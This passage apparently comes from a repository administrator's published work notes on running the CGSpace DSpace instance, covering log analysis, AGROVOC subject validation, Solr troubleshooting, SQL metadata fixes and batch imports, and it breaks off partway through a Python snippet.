# grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
+185
+
    +
  • Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:
  • +
+
# grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
+346
+
    +
  • In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
+      1 139.162.146.60
+      1 157.55.39.159
+      1 196.188.127.94
+      1 196.190.127.16
+      1 197.183.33.222
+      1 66.249.66.221
+      2 104.237.146.139
+      2 175.158.209.61
+      2 196.190.63.120
+      2 196.191.127.118
+      2 213.55.99.121
+      2 82.145.223.103
+      3 197.250.96.248
+      4 196.191.127.125
+      4 197.156.77.24
+      5 105.112.75.237
+    185 41.190.30.105
+    346 41.190.3.229
+    503 41.190.31.73
+
    +
  • That is so weird, they are all using this Android user agent:
  • +
+
Mozilla/5.0 (Linux; Android 7.0; TECNO Camon CX Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
+
    +
  • I wrote a quick and dirty Python script called resolve-addresses.py to resolve IP addresses to their owning organization’s name, ASN, and country using the IPAPI.co API
  • +
+
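  • Something like this would do it (a rough sketch, not necessarily the exact resolve-addresses.py code; the https://ipapi.co/&lt;ip&gt;/json/ endpoint and its org, asn, and country_name fields are my assumptions about the ipapi.co API, and it assumes Python 3 with the requests library):

#!/usr/bin/env python3
# Rough sketch: resolve IP addresses to organization, ASN, and country via ipapi.co
# (the endpoint and field names below are assumptions based on ipapi.co's JSON API)
import sys
import requests

def resolve(ip):
    r = requests.get(f"https://ipapi.co/{ip}/json/", timeout=10)
    r.raise_for_status()
    data = r.json()
    return data.get("org"), data.get("asn"), data.get("country_name")

if __name__ == "__main__":
    # one IP per line on stdin, for example piped from the awk/sort/uniq output above
    for line in sys.stdin:
        line = line.strip()
        if not line:
            continue
        ip = line.split()[-1]  # tolerate "count ip" lines from uniq -c
        org, asn, country = resolve(ip)
        print(f"{ip}\t{org}\t{asn}\t{country}")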

2019-02-20

+
    +
  • Ben Hack was asking about getting authors publications programmatically from CGSpace for the new ILRI website
  • +
  • I told him that they should probably try to use the REST API’s find-by-metadata-field endpoint
  • +
  • The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:
  • +
+
$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": ""}'
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": null}'
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://cgspace.cgiar.org/rest/items/find-by-metadata-field" -d '{"key": "cg.creator.id","value": "Alan S. Orth: 0000-0002-1735-7458", "language": "en_US"}'
+
    +
  • This returns six items for me, which is the same I see in a Discovery search
  • +
  • Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my dspace-statistics-api
  • +
  • I was playing with YasGUI to query AGROVOC’s SPARQL endpoint, but they must have a cached version or something because I get an HTTP 404 if I try to go to the endpoint manually
  • +
  • I think I want to stick to the regular web services to validate AGROVOC terms
  • +
+

YasGUI querying AGROVOC

+ +

2019-02-21

+
    +
  • I wrote a script agrovoc-lookup.py to resolve subject terms against the public AGROVOC REST API
  • +
  • It allows specifying the language the term should be queried in as well as output files to save the matched and unmatched terms to
  • +
  • I ran our top 1500 subjects through English, Spanish, and French and saved the matched and unmatched terms to separate files:
  • +
+
$ ./agrovoc-lookup.py -l en -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-en.txt -or /tmp/rejected-subjects-en.txt
+$ ./agrovoc-lookup.py -l es -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-es.txt -or /tmp/rejected-subjects-es.txt
+$ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-fr.txt -or /tmp/rejected-subjects-fr.txt
+
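  • The core of such a lookup is roughly this (a simplified sketch rather than the exact agrovoc-lookup.py code, assuming Python 3 with the requests library and treating any non-empty result list as a match):

#!/usr/bin/env python3
# Simplified sketch of an AGROVOC term lookup: write terms that return results to a
# "matched" file and everything else to a "rejected" file (the real script's matching
# criteria may differ)
import requests

API = "http://agrovoc.uniroma2.it/agrovoc/rest/v1/search"

def lookup(term, lang="en"):
    r = requests.get(API, params={"query": term, "lang": lang}, timeout=10)
    r.raise_for_status()
    return len(r.json().get("results", [])) > 0

def check_file(infile, matched_file, rejected_file, lang="en"):
    with open(infile) as inf, open(matched_file, "w") as mf, open(rejected_file, "w") as rf:
        for line in inf:
            term = line.strip()
            if not term:
                continue
            (mf if lookup(term, lang) else rf).write(term + "\n")

# e.g. check_file("/tmp/top-1500-subjects.txt", "/tmp/matched-subjects-en.txt", "/tmp/rejected-subjects-en.txt", "en")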
    +
  • Then I generated a list of all the unique matched terms:
  • +
+
$ cat /tmp/matched-subjects-* | sort | uniq > /tmp/2019-02-21-matched-subjects.txt
+
    +
  • And then a list of all the unique unmatched terms using a utility I’d never heard of before called comm, or alternatively with diff:
  • +
+
$ sort /tmp/top-1500-subjects.txt > /tmp/subjects-sorted.txt
+$ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt > /tmp/2019-02-21-unmatched-subjects.txt
+$ diff --new-line-format="" --unchanged-line-format="" /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt > /tmp/2019-02-21-unmatched-subjects.txt
+
    +
  • Generate a list of countries and regions from CGSpace for Sisay to look through:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-countries.csv WITH CSV HEADER;
+COPY 202
+dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 227 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-regions.csv WITH CSV HEADER;
+COPY 33
+
    +
  • I did a bit more work on the IITA research theme (adding it to Discovery search filters) and it’s almost ready so I created a pull request (#413)
  • +
  • I still need to test the batch tagging of IITA items with themes based on their IITA subjects: +
      +
    • NATURAL RESOURCE MANAGEMENT research theme to items with NATURAL RESOURCE MANAGEMENT subject
    • +
    • BIOTECH & PLANT BREEDING research theme to items with PLANT BREEDING subject
    • +
    • SOCIAL SCIENCE & AGRIBUSINESS research theme to items with AGRIBUSINESS subject
    • +
    • PLANT PRODUCTION & HEALTH research theme to items with PLANT PRODUCTION subject
    • +
    • PLANT PRODUCTION & HEALTH research theme to items with PLANT HEALTH subject
    • +
    • NUTRITION & HUMAN HEALTH research theme to items with NUTRITION subject
    • +
    +
  • +
+
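  • The mapping above boils down to something like this hypothetical Python sketch (not how I ended up doing it, since I later used GREL in OpenRefine, but it shows the subject-to-theme lookup and the || separator for items that need more than one theme):

# Hypothetical sketch of the IITA subject-to-research-theme mapping listed above
SUBJECT_TO_THEME = {
    "NATURAL RESOURCE MANAGEMENT": "NATURAL RESOURCE MANAGEMENT",
    "PLANT BREEDING": "BIOTECH & PLANT BREEDING",
    "AGRIBUSINESS": "SOCIAL SCIENCE & AGRIBUSINESS",
    "PLANT PRODUCTION": "PLANT PRODUCTION & HEALTH",
    "PLANT HEALTH": "PLANT PRODUCTION & HEALTH",
    "NUTRITION": "NUTRITION & HUMAN HEALTH",
}

def themes_for(subjects):
    """Return the multi-value research theme string for a list of IITA subjects."""
    themes = []
    for subject in subjects:
        theme = SUBJECT_TO_THEME.get(subject.strip().upper())
        if theme and theme not in themes:
            themes.append(theme)
    return "||".join(themes)

# themes_for(["PLANT HEALTH", "NUTRITION"]) -> "PLANT PRODUCTION & HEALTH||NUTRITION & HUMAN HEALTH"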

2019-02-22

+
    +
  • +

    Help Udana from WLE with some issues related to CGSpace items on their Publications website

    +
      +
    • He wanted some IWMI items to show up in their publications website
    • +
    • The items were mapped into WLE collections, but still weren’t showing up on the publications website
    • +
    • I told him that he needs to add the cg.identifier.wletheme to the items so that the website indexer finds them
    • +
    • A few days ago he added the metadata to 10568/93011 and now I see that the item is present on the WLE publications website
    • +
    +
  • +
  • +

    Start looking at IITA’s latest round of batch uploads called “IITA_Feb_14” on DSpace Test

    +
      +
    • One misspelled authorship type
    • +
    • A few dozen incorrect or inconsistent affiliations (I dumped a list of the top 1500 affiliations and reconciled against it, but it was still a lot of work)
    • +
    • One issue with smart quotes in countries
    • +
    • A few IITA subjects with syntax errors
    • +
    • Some whitespace and consistency issues in sponsorships
    • +
    • Eight items with invalid ISBN: 0-471-98560-3
    • +
    • Two incorrectly formatted ISSNs
    • +
    • Lots of incorrect values in subjects, but that’s a difficult problem to do in an automated way
    • +
    +
  • +
  • +

    I figured out how to query AGROVOC from OpenRefine using Jython by creating a custom text facet:

    +
  • +
+
import json
+import re
+import urllib
+import urllib2
+
+# OpenRefine runs this Jython snippet once per cell; "value" holds the cell contents
+pattern = re.compile('^S[A-Z ]+$')
+if pattern.match(value):
+  # query the AGROVOC REST API for the term in English
+  url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&lang=en'
+  get = urllib2.urlopen(url)
+  data = json.load(get)
+  # facet as "matched" when AGROVOC returns exactly one result
+  if len(data['results']) == 1:
+    return "matched"
+
+return "unmatched"
+
+

2019-02-24

+
    +
  • I decided to try to validate the AGROVOC subjects in IITA’s recent batch upload by dumping all their terms, checking them in en/es/fr with agrovoc-lookup.py, then reconciling against the final list using reconcile-csv with OpenRefine
  • +
  • I’m not sure how to deal with terms like “CORN” that are alternative labels (altLabel) in AGROVOC where the preferred label (prefLabel) would be “MAIZE”
  • +
  • For example, a query for CORN* returns:
  • +
+
    "results": [
+        {
+            "altLabel": "corn (maize)",
+            "lang": "en",
+            "prefLabel": "maize",
+            "type": [
+                "skos:Concept"
+            ],
+            "uri": "http://aims.fao.org/aos/agrovoc/c_12332",
+            "vocab": "agrovoc"
+        },
+
    +
  • There are dozens of other entries like “corn (soft wheat)”, “corn (zea)”, “corn bran”, “Cornales”, etc. that could potentially match, and determining whether they are related programmatically is difficult
  • +
  • Shit, and then there are terms like “GENETIC DIVERSITY” that should technically be “genetic diversity (as resource)”
  • +
  • I applied all changes to the IITA Feb 14 batch data except the affiliations and sponsorships, because I think I made some mistakes when copying the reconciled values, so I will look at those again separately
  • +
  • I went back and re-did the affiliations and sponsorships and then applied them on the IITA Feb 14 collection on DSpace Test
  • +
  • I did a duplicate check of the IITA Feb 14 records on DSpace Test and there were about fifteen or twenty items reported +
      +
    • A few of them are actually in previous IITA batch updates, which means they haven’t been uploaded to CGSpace yet, so I worry that there would be many more
    • +
    • I want to re-synchronize CGSpace to DSpace Test to make sure that the duplicate checking is accurate, but I’m not sure I can because the Earlham guys are still testing COPO actively on DSpace Test
    • +
    +
  • +
+

2019-02-25

+
    +
  • There seems to be something going on with Solr on CGSpace (linode18) because statistics on communities and collections are blank for January and February this year
  • +
  • I see some errors started recently in Solr (yesterday):
  • +
+
$ grep -c ERROR /home/cgspace.cgiar.org/log/solr.log.2019-02-*
+/home/cgspace.cgiar.org/log/solr.log.2019-02-11.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-12.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-13.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-14.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-15.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-16.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-17.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-18.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-19.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-20.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-21.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-22.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-23.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-24:34
+
    +
  • But I don’t see anything interesting in yesterday’s Solr log…
  • +
  • I see this in the Tomcat 7 logs yesterday:
  • +
+
Feb 25 21:09:29 linode18 tomcat7[1015]: Error while updating
+Feb 25 21:09:29 linode18 tomcat7[1015]: java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger$9.visit(SourceFile:1241)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger.visitEachStatisticShard(SourceFile:268)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger.update(SourceFile:1225)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger.update(SourceFile:1220)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.StatisticsLoggingConsumer.consume(SourceFile:103)
+...
+
    +
  • In the Solr admin GUI I see we have the following error: “statistics-2011: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher”
  • +
  • I restarted Tomcat and upon startup I see lots of errors in the systemd journal, like:
  • +
+
Feb 25 21:37:49 linode18 tomcat7[28363]: SEVERE: IOException while loading persisted sessions: java.io.StreamCorruptedException: invalid type code: 00
+Feb 25 21:37:49 linode18 tomcat7[28363]: java.io.StreamCorruptedException: invalid type code: 00
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1601)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:2287)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:561)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.lang.Throwable.readObject(Throwable.java:914)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+
    +
  • I don’t think that’s related…
  • +
  • Also, now the Solr admin UI says “statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher”
  • +
  • In the Solr log I see:
  • +
+
2019-02-25 21:38:14,246 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2015]: Error opening new searcher
+org.apache.solr.common.SolrException: Error opening new searcher
+        at org.apache.solr.core.SolrCore.<init>(SolrCore.java:873)
+        at org.apache.solr.core.SolrCore.<init>(SolrCore.java:646)
+...
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+        at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+        at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+        at org.apache.solr.core.SolrCore.<init>(SolrCore.java:845)
+        ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
+        at org.apache.lucene.store.Lock.obtain(Lock.java:89)
+        at org.apache.lucene.index.IndexWriter.<init>(IndexWriter.java:753)
+        at org.apache.solr.update.SolrIndexWriter.<init>(SolrIndexWriter.java:77)
+        at org.apache.solr.update.SolrIndexWriter.create(SolrIndexWriter.java:64)
+        at org.apache.solr.update.DefaultSolrCoreState.createMainIndexWriter(DefaultSolrCoreState.java:279)
+        at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
+        at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
+        ... 33 more
+2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
+
    +
  • I tried to shutdown Tomcat and remove the locks:
  • +
+
# systemctl stop tomcat7
+# find /home/cgspace.cgiar.org/solr -iname "*.lock" -delete
+# systemctl start tomcat7
+
    +
  • … but the problem still occurs
  • +
  • I can see that there are still hits being recorded for items (in the Solr admin UI as well as my statistics API), so the main stats core is working at least!
  • +
  • On a hunch I tried adding ulimit -v unlimited to the Tomcat catalina.sh and now Solr starts up with no core errors and I actually have statistics for January and February on some communities, but not others
  • +
  • I wonder if the address space limits that I added via LimitAS=infinity in the systemd service are somehow not working?
  • +
  • I did some tests with calling a shell script from systemd on DSpace Test (linode19) and the LimitAS setting does work, and the infinity setting in systemd does get translated to “unlimited” on the service
  • +
  • I thought it might be open file limit, but it seems we’re nowhere near the current limit of 16384:
  • +
+
# lsof -u dspace | wc -l
+3016
+
    +
  • For what it’s worth I see the same errors about solr_update_time_stamp on DSpace Test (linode19)
  • +
  • Update DSpace Test to Tomcat 7.0.93
  • +
  • Something seems to have happened (some Atmire scheduled task, perhaps the CUA one at 7AM?) on CGSpace because I checked a few communities and collections on CGSpace and there are now statistics for January and February
  • +
+

CGSpace statlets working again

+
    +
  • I still have not figured out what the real cause for the Solr cores to not load was, though
  • +
+

2019-02-26

+
    +
  • I sent a mail to the dspace-tech mailing list about the “solr_update_time_stamp” error
  • +
  • A CCAFS user sent a message saying they got this error when submitting to CGSpace:
  • +
+
Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1021 by user 3049
+
    +
  • According to the REST API collection 1021 appears to be CCAFS Tools, Maps, Datasets and Models
  • +
  • I looked at the WORKFLOW_STEP_1 (Accept/Reject) and the group is of course empty
  • +
  • As we’ve seen several times recently, we are not using this step so it should simply be deleted
  • +
+

2019-02-27

+
    +
  • Discuss batch uploads with Sisay
  • +
  • He’s trying to upload some CTA records, but it’s not possible to do collection mapping when using the web UI +
      +
    • I sent a mail to the dspace-tech mailing list to ask about the inability to perform mappings when uploading via the XMLUI batch upload
    • +
    +
  • +
  • He asked me to upload the files for him via the command line, but the file he referenced (Thumbnails_feb_2019.zip) doesn’t exist
  • +
  • I noticed that the command line batch import functionality is a bit weird when using zip files because you have to specify the directory where the zip file is located as well as the zip file’s name:
  • +
+
$ ~/dspace/bin/dspace import -a -e aorth@stfu.com -m mapfile -s /home/aorth/Downloads/2019-02-27-test/ -z SimpleArchiveFormat.zip
+
    +
  • Why don’t they just derive the directory from the path to the zip file?
  • +
  • Working on Udana’s Restoring Degraded Landscapes (RDL) WLE records that we originally started in 2018-11 and fixing many of the same problems that I originally did then +
      +
    • I also added a few regions because they are obvious for the countries
    • +
    • Also I added some rights fields that I noticed were easily available from the publications pages
    • +
    • I imported the records into my local environment with a fresh snapshot of the CGSpace database and ran the Atmire duplicate checker against them and it didn’t find any
    • +
    • I uploaded fifty-two records to the Restoring Degraded Landscapes collection on CGSpace
    • +
    +
  • +
+

2019-02-28

+
    +
  • I helped Sisay upload the nineteen CTA records from last week via the command line because they required mappings (which is not possible to do via the batch upload web interface)
  • +
+
$ dspace import -a -e swebshet@stfu.org -s /home/swebshet/Thumbnails_feb_2019 -m 2019-02-28-CTA-Thumbnails.map
+
    +
  • Mails from CGSpace stopped working; looks like ICT changed the password again or we got locked out, sigh
  • +
  • Now I’m getting this message when trying to use DSpace’s test-email script:
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: stfu@google.com
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+
    +
  • I’ve tried to log in with the last two passwords that ICT reset it to earlier this month, but they are not working
  • +
  • I sent a mail to ILRI ICT to check if we’re locked out or reset the password again
  • +
diff --git a/docs/2019-03/index.html b/docs/2019-03/index.html
new file mode 100644
index 000000000..5a263b4c8
--- /dev/null
+++ b/docs/2019-03/index.html

March, 2019

+ +
+

2019-03-01

+
    +
  • I checked IITA’s 259 Feb 14 records from last month for duplicates using Atmire’s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good
  • +
  • I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc…
  • +
  • Looking at the other half of Udana’s WLE records from 2018-11 +
      +
    • I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)
    • +
    • I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items
    • +
    • Most worryingly, there are encoding errors in the abstracts for eleven items, for example:
    • +
    • 68.15% � 9.45 instead of 68.15% ± 9.45
    • +
    • 2003�2013 instead of 2003–2013
    • +
    +
  • +
  • I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
  • +
+

2019-03-03

+
    +
  • Trying to finally upload IITA’s 259 Feb 14 items to CGSpace so I exported them from DSpace Test:
  • +
+
$ mkdir 2019-03-03-IITA-Feb14
+$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
+
    +
  • As I was inspecting the archive I noticed that there were some problems with the bitstreams: +
      +
    • First, Sisay didn’t include the bitstream descriptions
    • +
    • Second, only five items had bitstreams and I remember in the discussion with IITA that there should have been nine!
    • +
    • I had to refer to the original CSV from January to find the file names, then download and add them to the export contents manually!
    • +
    +
  • +
  • After adding the missing bitstreams and descriptions manually I tested them again locally, then imported them to a temporary collection on CGSpace:
  • +
+
$ dspace import -a -c 10568/99832 -e aorth@stfu.com -m 2019-03-03-IITA-Feb14.map -s /tmp/2019-03-03-IITA-Feb14
+
    +
  • DSpace’s export function doesn’t include the collections for some reason, so you need to import them somewhere first, then export the collection metadata and re-map the items to proper owning collections based on their types using OpenRefine or something
  • +
  • After re-importing to CGSpace to apply the mappings, I deleted the collection on DSpace Test and ran the dspace cleanup script
  • +
  • Merge the IITA research theme changes from last month to the 5_x-prod branch (#413) +
      +
    • I will deploy to CGSpace soon and then think about how to batch tag all IITA’s existing items with this metadata
    • +
    +
  • +
  • Deploy Tomcat 7.0.93 on CGSpace (linode18) after having tested it on DSpace Test (linode19) for a week
  • +
+

2019-03-06

+
    +
  • Abenet was having problems with a CIP user account, I think that the user could not register
  • +
  • I suspect it’s related to the email issue that ICT hasn’t responded about since last week
  • +
  • As I thought, I still cannot send emails from CGSpace:
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: blah@stfu.com
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
    +
  • I will send a follow-up to ICT to ask them to reset the password
  • +
+

2019-03-07

+
    +
  • ICT reset the email password and I confirmed that it is working now
  • +
  • Generate a controlled vocabulary of 1187 AGROVOC subjects from the top 1500 that I checked last month, dumping the terms themselves using csvcut and then applying XML controlled vocabulary format in vim and then checking with tidy for good measure:
  • +
+
$ csvcut -c name 2019-02-22-subjects.csv > dspace/config/controlled-vocabularies/dc-subject.xml
+$ # apply formatting in XML file
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
+
    +
  • I tested the AGROVOC controlled vocabulary locally and will deploy it on DSpace Test soon so people can see it
  • +
  • Atmire noticed my message about the “solr_update_time_stamp” error on the dspace-tech mailing list and created an issue on their tracker to discuss it with me +
      +
    • They say the error is harmless, but has nevertheless been fixed in their newer module versions
    • +
    +
  • +
+

2019-03-08

+
    +
  • There’s an issue with CGSpace right now where all items are giving a blank page in the XMLUI +
      +
    • Interestingly, if I check an item in the REST API it is also mostly blank: only the title and the ID! On second thought I realize I probably was just seeing the default view without any “expands”
    • +
    • I don’t see anything unusual in the Tomcat logs, though there are thousands of those solr_update_time_stamp errors:
    • +
    +
  • +
+
# journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
+1076
+
    +
  • I restarted Tomcat and it’s OK now…
  • +
  • Skype meeting with Peter and Abenet and Sisay +
      +
    • We want to try to crowd source the correction of invalid AGROVOC terms starting with the ~313 invalid ones from our top 1500
    • +
    • We will share a Google Docs spreadsheet with the partners and ask them to mark the deletions and corrections
    • +
    • Abenet and Alan to spend some time identifying correct DCTERMS fields to move to, with preference over CG Core 2.0 as we want to be globally compliant (use information from SEO crosswalks)
    • +
    • I need to follow up on the privacy page that Sisay worked on
    • +
    • We want to try to migrate the 600 Livestock CRP blog posts to CGSpace, Peter will try to export the XML from WordPress so I can try to parse it with a script
    • +
    +
  • +
+
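  • Just to sketch the idea: WordPress’s standard export is an RSS-like WXR XML file, so pulling out titles, dates, and post bodies could look roughly like this (the content:encoded namespace and the livestock-crp.xml filename are assumptions, since I haven’t seen Peter’s export yet; Python 3, standard library only):

#!/usr/bin/env python3
# Rough sketch: extract post titles, dates, and HTML bodies from a WordPress WXR export
import xml.etree.ElementTree as ET

# the content:encoded namespace typically used by WordPress exports (an assumption until I see the real file)
NS = {"content": "http://purl.org/rss/1.0/modules/content/"}

tree = ET.parse("livestock-crp.xml")  # hypothetical filename
for item in tree.getroot().findall("./channel/item"):
    title = item.findtext("title", default="")
    date = item.findtext("pubDate", default="")
    link = item.findtext("link", default="")
    body = item.findtext("content:encoded", default="", namespaces=NS)
    print(f"{date}\t{title}\t{link}\t({len(body)} characters of HTML)")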

2019-03-09

+
    +
  • I shared a post on Yammer informing our editors to try the AGROVOC controlled list
  • +
  • The SPDX legal committee had a meeting and discussed the addition of CC-BY-ND-3.0-IGO and other IGO licenses to their list, but it seems unlikely (spdx/license-list-XML/issues/767)
  • +
  • The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms
  • +
  • I see 46 occurrences of these with this query:
  • +
+
dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
+
    +
  • I can replace these globally using the following SQL:
  • +
+
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https://feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
+UPDATE 43
+dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https://feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
+UPDATE 44
+
    +
  • I ran the corrections on CGSpace and DSpace Test
  • +
+

2019-03-10

+
    +
  • Working on tagging IITA’s items with their new research theme (cg.identifier.iitatheme) based on their existing IITA subjects (see notes from 2019-02)
  • +
  • I exported the entire IITA community from CGSpace and then used csvcut to extract only the needed fields:
  • +
+
$ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv > /tmp/iita.csv
+
    +
  • +

    After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a ||)

    +
  • +
  • +

    I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:

    +
  • +
+
if(isBlank(value), 'PLANT PRODUCTION & HEALTH', value + '||PLANT PRODUCTION & HEALTH')
+
    +
  • Then it’s more annoying because there are four IITA subject columns…
  • +
  • In total this would add research themes to 1,755 items
  • +
  • I want to double check one last time with Bosede that they would like to do this, because I also see that this will tag a few hundred items from the 1970s and 1980s
  • +
+

2019-03-11

+
    +
  • Bosede said that she would like the IITA research theme tagging only for items since 2015, which would be 256 items
  • +
+

2019-03-12

+
    +
  • I imported the changes to 256 of IITA’s records on CGSpace
  • +
+

2019-03-14

+
    +
  • CGSpace had the same issue with blank items like earlier this month and I restarted Tomcat to fix it
  • +
  • Create a pull request to change Swaziland to Eswatini and Macedonia to North Macedonia (#414) +
      +
    • I see thirty-six items using Swaziland country metadata, and Peter says we should change only those from 2018 and 2019
    • +
    • I think that I could get the resource IDs from SQL and then export them using dspace metadata-export
    • +
    +
  • +
  • This is a bit ugly, but it works (using the DSpace 5 SQL helper function to resolve ID to handle):
  • +
+
for id in $(psql -U postgres -d dspacetest -h localhost -c "SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'" | grep -oE '[0-9]{3,}'); do
+
+    echo "Getting handle for id: ${id}"
+
+    handle=$(psql -U postgres -d dspacetest -h localhost -c "SELECT ds5_item2itemhandle($id)" | grep -oE '[0-9]{5}/[0-9]+')
+
+    ~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
+
+done
+
    +
  • Then I couldn’t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:
  • +
+
$ grep -oE '201[89]' /tmp/*.csv | sort -u
+/tmp/94834.csv:2018
+/tmp/95615.csv:2018
+/tmp/96747.csv:2018
+
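  • A slightly less hacky alternative would have been a few lines of Python over the exported CSVs (a sketch only, assuming the dc.date.issued[en_US]-style column names that dspace metadata-export writes):

#!/usr/bin/env python3
# Sketch: scan the per-item CSVs from metadata-export and print items issued in 2018 or 2019
import csv
import glob

for path in glob.glob("/tmp/*.csv"):
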